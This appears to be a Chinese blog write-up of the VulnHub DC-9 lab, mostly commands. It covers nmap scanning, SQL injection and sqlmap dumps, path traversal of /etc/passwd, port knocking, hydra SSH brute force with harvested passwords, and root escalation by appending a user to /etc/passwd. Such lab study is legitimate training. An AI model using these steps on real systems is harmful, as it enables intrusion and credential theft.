漏洞复现 -- DC-9

最新推荐文章于 2024-09-28 22:33:00 发布

冷酷小帅~0x7e

最新推荐文章于 2024-09-28 22:33:00 发布

阅读量170

点赞数 1

文章标签：网络安全安全 python

本文链接：https://blog.csdn.net/2301_80854251/article/details/141499360

版权

靶场地址

https://download.vulnhub.com/dc/DC-9.zip

目标

找到所有的flag

漏洞复现

sudo arp-scan -l
#	探测主机存活

nmap -p- 192.168.5.133 --min-rate=5000
#	探测开放端口，只有一个80端口开放

http://192.168.5.133:80
#	访问网站首页

在搜索页面输入 1' or 1=1 # ，发现一些用户数据被爆出来了，说明这个页面存在SQL注入

python3 sqlmap.py -u "http://192.168.5.133/search.php" -data "search=1" --batch --dbs
# 爆库

python3 sqlmap.py -u "http://192.168.5.133/search.php" -data "search=1" -D users -tables
# 爆表

python3 sqlmap.py -u "http://192.168.5.133/search.php" -data "search=1" -D users -T UserDetails -dump
#	爆列，都是员工账号密码

python3 sqlmap.py -u "http://192.168.5.133/search.php" --data "search=1" -D Staff -tables
#	爆表

python3 sqlmap.py -u "http://192.168.5.133/search.php" --data "search=1" -D Staff -T StaffDetails -dump
# 查看StaffDetail表的数据，是员工的详细信息

python3 sqlmap.py -u "http://192.168.5.133/search.php" --data "search=1" -D Staff -T Users -dump
#	爆出来一个admin账户和密码，但是密码是加密的
  admin 856f5de590ef37314e7c3bdf6f8a66dc
->admin transorbital1

在 Add Record 页面中，根据提示 File does not exist ，分析可能存在文件包含漏洞

在url处，拼接路径 ?file=../../../../etc/passwd

尝试读取日志文件 ?file=../../../../var/log/messages ，发现读取不了，到这里就没法做了，根据查阅资料，发现可以使用knockd服务开启端口

?file=../../../../etc/knockd.conf
# 访问下knockd配置文件

nmap -p 7469 192.168.5.133
nmap -p 8475 192.168.5.133
nmap -p 9842 192.168.5.133
#	依次对7469,8475,9842端口进行敲门，然后就可以开门

nmap -p- 192.168.5.133 --min-rate=5000
#	重新扫描端口，发现22端口也已经开放

将之前SQL注入得到的账号密码编写成字典 user.txt passwd.txt

marym
julied
fredf
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
janitor

UrAG0D!
Passw0rd
Ilovepeepee
qweqeq123
ad4a8da3sd4a6
asd7ad1a32d1a

hydra -L user.txt -P passwd.txt 192.168.5.133 ssh
#	使用hydra工具爆破ssh的账号密码

ssh chandlerd@192.168.5.133
UrAG0D!
# 未发现有用东西

ssh joeyt@192.168.5.133
Passw0rd
# 未发现有用东西

ssh janitor@192.168.5.133
Ilovepeepee
#	发现比上面两个账户多了一个文件夹

ls -al
cd .secrets-for-putin/
ls -al
cat passwords-found-on-post-it-notes.txt
# 好像是几个账户密码，把这些密码加入到之前的那个密码字典里面，后面再进行爆破一次

hydra -L user.txt -P passwd.txt 192.168.5.133 ssh
#	使用hydra工具再次爆破ssh的账号密码
  fredf B4-Tru3-001

ssh fredf@192.168.5.133
B4-Tru3-001

sudo -l
#	查找可以SUID提权的命令

cd /opt
ls -al
cd devstuff
ls -al
cat test.py
# 这是一个写入文件的脚本，生成一个密码用root权限执行脚本写入/etc/passwd文件，所以我们现在就需要构造一个拥有root权限的用户，并且在/etc/passwd文件中储存，只要使用这个用户登录后，就可以获取到root权限

openssl passwd -1 -salt admin admin
# 使用openssl工具创建一个本地的加密用户

cd /opt/devstuff/dist/test

echo 'admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0::/root:/bin/bash' >> /tmp/test1
# 使用echo命令在/tmp目录下创建一个文件

sudo ./test /tmp/test1 /etc/passwd
# 使用sudo命令执行test文件将/tmp/test1的内容写入到/etc/passwd文件中

su admin
# 使用命令su admin切换到我们添加的admin用户，输入之前设置好密码即可登录

cd ../../../../root
ls -al
cat theflag.txt

总结

1、Hydra（暴力破解工具）

基本语法：
  Hydra [-l 用户名|–L 用户名文件路径] [-p 密码|–P 密码文件路径] [-t 线程数] [–vV 显示详细信息] [–o 输出文件路径] [–f 找到密码就停止] [–e ns 空密码和指定密码试探] [ip|-M ip列表文件路径]
常用参数：
  -l					# LOGIN 指定破解的用户，对特定用户破解。
  -L					# FILE 指定用户名字典。
  -p					# PASS 小写，指定密码破解，少用，一般是采用密码字典。
  -P					# FILE 大写，指定密码字典。
  -M					# FILE 指定目标列表文件一行一条。
  -o					# FILE 指定结果输出文件。

hydra -L user.txt -P passwd.txt 192.168.5.133 ssh
# 使用hydra工具爆破192.168.5.133的ssh账号密码